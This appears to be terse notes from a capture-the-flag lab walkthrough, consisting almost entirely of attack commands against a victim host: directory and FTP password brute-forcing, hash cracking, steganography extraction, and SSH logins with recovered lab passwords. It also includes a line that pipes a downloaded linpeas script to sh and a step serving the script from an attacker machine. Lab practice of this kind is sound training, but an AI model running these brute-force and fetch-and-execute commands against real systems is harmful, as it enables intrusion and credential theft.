gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Hash cracking and brute-force
hydra -l chris -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ftp://$VICTIM
ftp $VICTIM
Username: chris
Password: crystal
binwalk cutie.png
binwalk cutie.png -e
zip2john 8702.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt
7z e 8702.zip
Password: alien
steghide extract -sf cute-alien.jpg
Password: Alien51
ssh james@$VICTIM
Password: hackerrules!
scp james@$VICTIM:/home/james/Alien_autospy.jpg .
Linpeas found that sudo is vulnerable, so I looked at the version online and found a way to escalate my privilege's.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81
cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh